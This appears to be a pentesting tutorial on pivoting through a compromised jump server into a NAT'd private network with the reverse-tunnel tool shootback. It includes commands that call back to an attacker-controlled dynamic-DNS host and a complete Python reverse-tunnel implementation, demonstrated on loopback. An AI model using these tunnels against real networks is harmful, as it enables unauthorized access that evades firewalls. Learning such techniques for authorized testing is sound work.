Good day viewers,
Today I bring another interesting scenario: pentesting servers that sit behind NAT, or Windows reverse RDP/SSH. In layman's words, connecting to Windows/Linux/xxxxx servers via RDP/SSH/TCP/UDP when those servers are behind NAT.
In r/explainlikeimfive words:
Imagine you are auditing / pentesting a server and you find remote code execution (RCE) on it. Unfortunately, the server is just a bastion / jump server, and the application servers behind it sit on a private network that is not exposed to the public network. You need a way to audit the application servers listening on that private network, or to connect to them via SSH / RDP / TCP / UDP. How do we achieve that? Yes, I know there are a number of ways to do this, so let me explain one way which I found easy.
I tried many different netcat scenarios, routing ports internally, connecting via socat etc., without any luck.
I tried to set up a reverse SSH tunnel using plink, but there we have to expose our SSH username and password on the target PC, which I would never recommend in pentesting if you want to be discreet.
Finally, I found what I was looking for, "a reverse TCP tunnel which lets you access a target behind NAT or firewall": shootback.
It works fairly simply: when you cannot reach the private network directly, it lets a process on the jump server connect back out to you, and your traffic then rides that outbound connection in reverse into the private network. Two scripts are involved: master.py runs on your machine and listens, slaver.py runs on the jump server and connects out to it.
Your Machine
Syntax
python3 master.py -m <YOUR_IP_ADDRESS>:<SLAVER_LISTEN_PORT> -c <YOUR_IP_ADDRESS>:<CUSTOMER_LISTEN_PORT>
-m is the port the jump server's slaver.py connects back to; -c is the local port you will point your own RDP/SSH client at.
Example
python3 master.py -m 0.0.0.0:9999 -c 0.0.0.0:7676
Note that binding -c to 0.0.0.0 lets anyone who can reach your machine on port 7676 use the tunnel into the target. If you only connect from the same host, 127.0.0.1:7676 is the safer choice.
On JumpServer / Target Machine
Syntax
python.exe slaver.py -m <YOUR_PUBLIC_IP or DYNAMIC DNS>:<YOUR_LISTEN_PORT> -t <TARGET_APPLICATION_IP_ADDRESS>:<TARGET_APPLICATION_PORT>
-m is your master's listening address; -t is the internal application you want to reach. The jump server only needs outbound access to your machine on that port; nothing has to be opened inbound on the jump server.
Example
python.exe slaver.py -m thisisexample.dyndns.com:9999 -t 10.30.11.54:3389
Once you run the above command, you will see the connection being established to your listening machine.
The master now forwards whatever arrives on port 7676 over that connection to the slaver, which hands it to 10.30.11.54:3389. So we point our RDP client at our own IP address on port 7676 and reach the internal host.
Voila! Here it is: I am connected to the private network behind the load balancer / NAT via the jump server.
Tip: If the target system doesn't have Python, you can always upload a portable Python zip file and extract it; use your creativity.
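To make the mechanism concrete, here is an added Python sketch of how a reverse TCP tunnel of this kind fits together. It is example code written for this post, not shootback's own source: the Master and Slaver classes mirror the -m/-c and -m/-t roles above, but the one-byte "customer waiting" signal is a simplification of the real tool's handshake. The echo service standing in for 10.30.11.54:3389, the loopback addresses and the payloads are all constructed for the example.

```python
import socket
import threading
import time

SIGNAL = b"\x01"  # "a customer is waiting" marker; our simplification, not shootback's handshake


def listen(addr):
    """Bind a TCP listener; port 0 lets the OS pick a free port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(addr)
    s.listen(5)
    return s


def pipe(src, dst):
    """Copy src -> dst until src hits EOF, then half-close dst so the EOF propagates."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay(a, b):
    """Bidirectional relay; returns once both directions have drained."""
    threads = [threading.Thread(target=pipe, args=(a, b), daemon=True),
               threading.Thread(target=pipe, args=(b, a), daemon=True)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


class Master:
    """Your machine (master.py role). -m side accepts the slaver's OUTBOUND connection
    from the jump server; -c side accepts your RDP/SSH client (the 'customer')."""

    def __init__(self, slaver_addr, customer_addr):
        self.slaver_sock = listen(slaver_addr)
        self.customer_sock = listen(customer_addr)
        self.slaver_addr = self.slaver_sock.getsockname()
        self.customer_addr = self.customer_sock.getsockname()
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            customer, _ = self.customer_sock.accept()
            # Pair the customer with the spare connection the slaver keeps parked here
            # and tell the slaver to open its side to the real target now.
            spare, _ = self.slaver_sock.accept()
            spare.sendall(SIGNAL)
            threading.Thread(target=relay, args=(customer, spare), daemon=True).start()


class Slaver:
    """Jump server (slaver.py role): only makes outbound connections, so NAT is no obstacle."""

    def __init__(self, master_addr, target_addr):
        self.master_addr = master_addr
        self.target_addr = target_addr
        threading.Thread(target=self._loop, daemon=True).start()

    def _loop(self):
        while True:
            try:
                spare = socket.create_connection(self.master_addr)
            except OSError:          # master unreachable: back off and retry
                time.sleep(0.5)
                continue
            if spare.recv(1) != SIGNAL:   # master closed without a customer
                spare.close()
                time.sleep(0.5)
                continue
            try:
                target = socket.create_connection(self.target_addr)
            except OSError:
                spare.close()        # customer gets a clean EOF instead of a hang
                continue
            # This spare now carries one session; the loop parks a fresh spare for the next one.
            threading.Thread(target=relay, args=(spare, target), daemon=True).start()


def start_fake_target():
    """Constructed stand-in for the internal app (10.30.11.54:3389 in the post): upper-cases input."""
    srv = listen(("127.0.0.1", 0))

    def handle(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


def through_tunnel(customer_addr, payload):
    """Act as the pentester's client: connect to the -c port, send, read until EOF."""
    with socket.create_connection(customer_addr, timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def run_demo():
    target = start_fake_target()
    # -c bound to 127.0.0.1 on purpose: 0.0.0.0 would hand the tunnel to anyone who reaches us.
    master = Master(("127.0.0.1", 0), ("127.0.0.1", 0))
    Slaver(master.slaver_addr, target)
    first = through_tunnel(master.customer_addr, b"ping from customer")
    second = through_tunnel(master.customer_addr, b"second session")  # proves the slaver re-parks a spare
    return first, second


if __name__ == "__main__":
    print(run_demo())
```

The point to notice is the direction of the arrows: the only connection that crosses the NAT boundary is opened by the slaver, outbound, exactly as plink would do, but without leaving any of your credentials on the jump server. The second session in run_demo shows why the slaver must always keep a spare connection parked at the master: without it, a new customer would have nothing to be paired with.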
Disclaimer: This is strictly for educational purposes only, please use this responsibly.
Cheers.